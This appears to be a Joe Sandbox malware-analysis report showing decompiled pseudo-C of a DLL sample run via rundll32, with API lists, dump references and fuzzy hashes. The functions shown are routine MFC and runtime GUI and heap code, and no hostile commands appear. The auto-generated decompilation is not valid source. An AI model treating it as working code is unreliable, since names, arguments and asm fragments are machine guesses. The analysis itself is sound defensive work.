                                                                                                        			E100296F9(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10072650; // 0xb5e27fef
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000836F(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E1003E9B0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E10039F21(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}


















                                                                                                        0x100296f9
                                                                                                        0x100296f9
                                                                                                        0x10029702
                                                                                                        0x10029709
                                                                                                        0x1002970d
                                                                                                        0x10029710
                                                                                                        0x10029713
                                                                                                        0x10029717
                                                                                                        0x10029719
                                                                                                        0x10029719
                                                                                                        0x10029719
                                                                                                        0x10029720
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002972e
                                                                                                        0x10029739
                                                                                                        0x10029740
                                                                                                        0x1002974f
                                                                                                        0x10029778
                                                                                                        0x10029778
                                                                                                        0x1002978c

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(1001CD09,?,00000204), ref: 10029723
                                                                                                        • _memset.LIBCMT ref: 10029740
                                                                                                        • GetWindowTextA.USER32 ref: 1002975A
                                                                                                        • lstrcmpA.KERNEL32(00000000,1001CD09,?,00000204), ref: 1002976C
                                                                                                        • SetWindowTextA.USER32(?,1001CD09), ref: 10029778
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4273134663-0
                                                                                                        • Opcode ID: 73d75559436bcefe679aad859e1ec81ef78f2e52970d834ce1686c7b00a775b9
                                                                                                        • Instruction ID: d79ae2653591de456ef6bd2db6884c1d3a6ceef9402fb6a909dc4ec732488626
                                                                                                        • Opcode Fuzzy Hash: 73d75559436bcefe679aad859e1ec81ef78f2e52970d834ce1686c7b00a775b9
                                                                                                        • Instruction Fuzzy Hash: 630180B6A04228ABE711DFA49CC5BDAB7ACEF08781F004065F946E7141EA709E448BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001FD2C, Relevance: 7.5, APIs: 5, Instructions: 48stringwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 61%
                                                                                                        			E1001FD2C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t17;
				int _t27;
				int _t29;
				void* _t37;
				void* _t41;
				int _t43;
				void* _t44;

				_t37 = __edx;
				_push(0xc);
				E1003EE82(0x10054b80, __ebx, __edi, __esi);
				_t41 = __ecx;
				_t17 = lstrlenA( *(_t44 + 8));
				SendMessageA( *(_t41 + 0x20), 0xb0, _t44 - 0x18, _t44 - 0x14);
				if(_t17 ==  *(_t44 - 0x14) -  *(_t44 - 0x18)) {
					E10001DB0(_t44 - 0x10, E10007F7E());
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					E1001FCC1(_t41, __eflags, _t44 - 0x10);
					__eflags =  *(_t44 + 0xc);
					_push( *((intOrPtr*)(_t44 - 0x10)));
					_push( *(_t44 + 8));
					if( *(_t44 + 0xc) == 0) {
						_t27 = lstrcmpiA();
					} else {
						_t27 = lstrcmpA();
					}
					__eflags = _t27;
					if(_t27 == 0) {
						_t43 = 1;
					} else {
						_t43 = 0;
						__eflags = 0;
					}
					__eflags =  *((intOrPtr*)(_t44 - 0x10)) + 0xfffffff0;
					E10001280( *((intOrPtr*)(_t44 - 0x10)) + 0xfffffff0, _t37);
					_t29 = _t43;
				} else {
					_t29 = 0;
				}
				return E1003EF21(_t29);
			}










                                                                                                        0x1001fd2c
                                                                                                        0x1001fd2c
                                                                                                        0x1001fd33
                                                                                                        0x1001fd38
                                                                                                        0x1001fd3d
                                                                                                        0x1001fd55
                                                                                                        0x1001fd63
                                                                                                        0x1001fd72
                                                                                                        0x1001fd77
                                                                                                        0x1001fd81
                                                                                                        0x1001fd86
                                                                                                        0x1001fd8a
                                                                                                        0x1001fd8d
                                                                                                        0x1001fd90
                                                                                                        0x1001fdb3
                                                                                                        0x1001fd92
                                                                                                        0x1001fd92
                                                                                                        0x1001fd92
                                                                                                        0x1001fd98
                                                                                                        0x1001fd9a
                                                                                                        0x1001fdbd
                                                                                                        0x1001fd9c
                                                                                                        0x1001fd9c
                                                                                                        0x1001fd9c
                                                                                                        0x1001fd9c
                                                                                                        0x1001fda1
                                                                                                        0x1001fda4
                                                                                                        0x1001fda9
                                                                                                        0x1001fd65
                                                                                                        0x1001fd65
                                                                                                        0x1001fd65
                                                                                                        0x1001fdb0

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1001FD33
                                                                                                        • lstrlenA.KERNEL32(?,0000000C,100202E6,?,?), ref: 1001FD3D
                                                                                                        • SendMessageA.USER32 ref: 1001FD55
                                                                                                        • lstrcmpA.KERNEL32(?,?,00000000), ref: 1001FD92
                                                                                                        • lstrcmpiA.KERNEL32(?,?,00000000), ref: 1001FDB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3MessageSendlstrcmplstrcmpilstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1609606499-0
                                                                                                        • Opcode ID: 8a296c5ca0aafa06c8edc8aeb3344f173ee353cdff9e58b4c12b408c3357251e
                                                                                                        • Instruction ID: 77828da9436fa0150061cf1079abb91dd9198ff343c3eae9ce8ecb19b3ffa369
                                                                                                        • Opcode Fuzzy Hash: 8a296c5ca0aafa06c8edc8aeb3344f173ee353cdff9e58b4c12b408c3357251e
                                                                                                        • Instruction Fuzzy Hash: 420169366000299FEB51DBE4CC45AFE77BAFF14790F110219F902AA191CF70AA809BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10023E91, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E10023E91(void* __ebx, void* __ecx, void* __edi, char _a8) {
				struct tagPOINT _v12;
				void* __esi;
				void* __ebp;
				intOrPtr _t15;
				intOrPtr _t18;
				void* _t27;
				intOrPtr* _t29;

				_push(__ecx);
				_push(__ecx);
				_t30 = _a8 - 1;
				_t27 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t27 + 0x20),  &_v12);
					__eflags =  *((intOrPtr*)(_t27 + 0x10c)) - 2;
					if( *((intOrPtr*)(_t27 + 0x10c)) == 2) {
						L7:
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t18 = E10023CDE(_t27,  &_v12,  &_a8);
						__eflags = _t18;
						if(_t18 == 0) {
							goto L7;
						} else {
							_t29 = _t27 + 0x120;
							__eflags =  *_t29;
							if(__eflags == 0) {
								 *_t29 = LoadCursorA( *(E1000AB19(__ebx, __edi, _t29, __eflags) + 0xc), 0x7902);
							}
							_push( *_t29);
						}
					}
					SetCursor();
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E1000E541(__ebx, __ecx, __edi, _t30);
				}
				return _t15;
			}










                                                                                                        0x10023e94
                                                                                                        0x10023e95
                                                                                                        0x10023e96
                                                                                                        0x10023e9b
                                                                                                        0x10023e9d
                                                                                                        0x10023eaa
                                                                                                        0x10023eb7
                                                                                                        0x10023ebd
                                                                                                        0x10023ec4
                                                                                                        0x10023efe
                                                                                                        0x10023f0b
                                                                                                        0x10023ec6
                                                                                                        0x10023ed0
                                                                                                        0x10023ed5
                                                                                                        0x10023ed7
                                                                                                        0x00000000
                                                                                                        0x10023ed9
                                                                                                        0x10023ed9
                                                                                                        0x10023edf
                                                                                                        0x10023ee2
                                                                                                        0x10023ef8
                                                                                                        0x10023ef8
                                                                                                        0x10023efa
                                                                                                        0x10023efa
                                                                                                        0x10023ed7
                                                                                                        0x10023f0c
                                                                                                        0x10023f12
                                                                                                        0x10023f12
                                                                                                        0x10023e9f
                                                                                                        0x10023e9f
                                                                                                        0x10023e9f
                                                                                                        0x10023f16

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$ClientLoadScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 120721131-0
                                                                                                        • Opcode ID: 74d2b440bdd97ca74c93bb51cf6cc3d31f3ccc4228e571ad7a2809ea142265f6
                                                                                                        • Instruction ID: cd1d569dbbc09192928a42496d03b828ff21698325098b174b07d59a507fd74d
                                                                                                        • Opcode Fuzzy Hash: 74d2b440bdd97ca74c93bb51cf6cc3d31f3ccc4228e571ad7a2809ea142265f6
                                                                                                        • Instruction Fuzzy Hash: 03019EB1904219EFEB00DBA1DC4AE8A77FCEF04751F418425F949A6091EB74AA84CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002526E, Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002526E(void* _a4, void* _a8) {
				void* _v12;
				void* _t7;
				DEVMODEA* _t8;
				struct HDC__* _t17;
				void* _t21;
				struct HDC__* _t25;
				signed short* _t28;

				if(_a4 != 0) {
					_t7 = GlobalLock(_a4);
					_t21 = _a8;
					_t28 = _t7;
					if(_t21 == 0) {
						_t8 = 0;
					} else {
						_t8 = GlobalLock(_t21);
					}
					if(_t28 != 0) {
						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
						GlobalUnlock(_v12);
						if(_t21 != 0) {
							GlobalUnlock(_t21);
						}
						_t17 = _t25;
					} else {
						_t17 = 0;
					}
					return _t17;
				}
				return 0;
			}










                                                                                                        0x10025273
                                                                                                        0x10025286
                                                                                                        0x10025288
                                                                                                        0x1002528e
                                                                                                        0x10025290
                                                                                                        0x10025297
                                                                                                        0x10025292
                                                                                                        0x10025293
                                                                                                        0x10025293
                                                                                                        0x1002529b
                                                                                                        0x100252c6
                                                                                                        0x100252c8
                                                                                                        0x100252cc
                                                                                                        0x100252cf
                                                                                                        0x100252cf
                                                                                                        0x100252d1
                                                                                                        0x1002529d
                                                                                                        0x1002529d
                                                                                                        0x1002529d
                                                                                                        0x00000000
                                                                                                        0x100252d5
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2848605275-0
                                                                                                        • Opcode ID: 58ceba588bdf153a735d19f2c057d62138fc618c6032f0ba06e9324e1696806c
                                                                                                        • Instruction ID: b67ccbe8f1da40791c83d960b7f87205bb2ab9deaf7b99a51417704be82a18a1
                                                                                                        • Opcode Fuzzy Hash: 58ceba588bdf153a735d19f2c057d62138fc618c6032f0ba06e9324e1696806c
                                                                                                        • Instruction Fuzzy Hash: 18F0F971601331D7C360CB25EC84A177BDCEF89AA2B554C25F845E2240D635CC08D770
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002743F, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$Byte$Free_memcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1539101663-0
                                                                                                        • Opcode ID: 1f96247d5dc3cde1eafd621ec8853b25e240a467bea0432b1988a91b4f4e3fdd
                                                                                                        • Instruction ID: 904f76b961c1897f44991566d87fdad2c69b44d4214e760ea279cbe038b82c15
                                                                                                        • Opcode Fuzzy Hash: 1f96247d5dc3cde1eafd621ec8853b25e240a467bea0432b1988a91b4f4e3fdd
                                                                                                        • Instruction Fuzzy Hash: 43F06D32A00119FBDB11AF65DD8989F7FA9FF442947510469F90996120EB31DF00DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10039F30, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E10039F30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1006cbc8);
				_t8 = E1003F350(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E1003F395(_t8);
				}
				if( *0x1009b238 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x100995ac, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1003F256(_t31);
						 *_t10 = E1003F21B(GetLastError());
					}
					goto L9;
				}
				E1004091C(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10040995(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E100409C0();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E10039F86();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                        0x10039f30
                                                                                                        0x10039f32
                                                                                                        0x10039f37
                                                                                                        0x10039f3c
                                                                                                        0x10039f41
                                                                                                        0x10039fb8
                                                                                                        0x10039fbd
                                                                                                        0x10039fbd
                                                                                                        0x10039f4a
                                                                                                        0x10039f8f
                                                                                                        0x10039f90
                                                                                                        0x10039f98
                                                                                                        0x10039f9e
                                                                                                        0x10039fa0
                                                                                                        0x10039fa2
                                                                                                        0x10039fb5
                                                                                                        0x10039fb7
                                                                                                        0x00000000
                                                                                                        0x10039fa0
                                                                                                        0x10039f4e
                                                                                                        0x10039f54
                                                                                                        0x10039f59
                                                                                                        0x10039f5f
                                                                                                        0x10039f64
                                                                                                        0x10039f66
                                                                                                        0x10039f67
                                                                                                        0x10039f68
                                                                                                        0x10039f6e
                                                                                                        0x10039f6f
                                                                                                        0x10039f76
                                                                                                        0x10039f7f
                                                                                                        0x00000000
                                                                                                        0x10039f81
                                                                                                        0x10039f81
                                                                                                        0x00000000
                                                                                                        0x10039f81

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 10039F4E
                                                                                                          • Part of subcall function 1004091C: __mtinitlocknum.LIBCMT ref: 10040930
                                                                                                          • Part of subcall function 1004091C: __amsg_exit.LIBCMT ref: 1004093C
                                                                                                          • Part of subcall function 1004091C: EnterCriticalSection.KERNEL32(00000001,00000001,?,10045B45,0000000D,1006CE80,00000008,10045C37,00000001,?,?,00000001,?,?,1003D264,00000001), ref: 10040944
                                                                                                        • ___sbh_find_block.LIBCMT ref: 10039F59
                                                                                                        • ___sbh_free_block.LIBCMT ref: 10039F68
                                                                                                        • HeapFree.KERNEL32(00000000,?,1006CBC8,0000000C,10045A9B,00000000,?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935), ref: 10039F98
                                                                                                        • GetLastError.KERNEL32(?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935,00000001,00000001,?,10045B45,0000000D,1006CE80), ref: 10039FA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: fad808a6aa72dc2463189a86ec99b203af1aab2ab6548a90a9c4c89e3f65d7c9
                                                                                                        • Instruction ID: 8d3ad547cfeb5d1e3a48017fed18afe67e470666c06bcb8db026dd063567bcab
                                                                                                        • Opcode Fuzzy Hash: fad808a6aa72dc2463189a86ec99b203af1aab2ab6548a90a9c4c89e3f65d7c9
                                                                                                        • Instruction Fuzzy Hash: F9016275805716AEEB12DFB09C4679E7AA4EF41662F200129F448EE1D1DB34AA408B58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10012CC8, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E10012CC8(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t223;
				signed int _t230;
				intOrPtr* _t232;
				void* _t243;
				intOrPtr _t257;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				intOrPtr _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t232 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x110))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E1000775D(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E10011BF2(_t232, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t243 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t232 + 0x80);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									_push(_t243);
									asm("sbb eax, eax");
									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t223;
									_push(_t223);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
													_t230 = _a8 & 0x00000020;
													__eflags = _t230;
													if(_t230 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t230);
													_t243 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t243);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t243);
										_push( *((intOrPtr*)(_t232 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E100125DE(_t232, _t277);
							}
							_t189 = E100124AF(_t232,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t257 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t257 = _t257 - 1;
									} while (_t257 != 0);
									_t314 = _a12;
									if(_a12 > 0) {
										_t278 = 0x18;
										_t213 = E1000775D(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
												E10008D4F(_t232,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t232 + 0x80);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E100122B1(_t232, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E10011593(_t232,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E100117F5(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									_push(_v24);
									E10007788(_t232, _t281, _t293, _t329);
								}
								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
							}
							_push(_v8);
							E10007788(_t232, _t281, _t291, _t329);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E1002BB83( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}









































                                                                                                        0x10012cd3
                                                                                                        0x10012cd6
                                                                                                        0x10012cd7
                                                                                                        0x10012cdb
                                                                                                        0x10012cdc
                                                                                                        0x10012ce1
                                                                                                        0x10012ce4
                                                                                                        0x10012ce6
                                                                                                        0x10012ce9
                                                                                                        0x10012cf5
                                                                                                        0x10012cf8
                                                                                                        0x10012d00
                                                                                                        0x10012d01
                                                                                                        0x10012d0b
                                                                                                        0x10012d10
                                                                                                        0x10012d16
                                                                                                        0x10012d19
                                                                                                        0x10012d1f
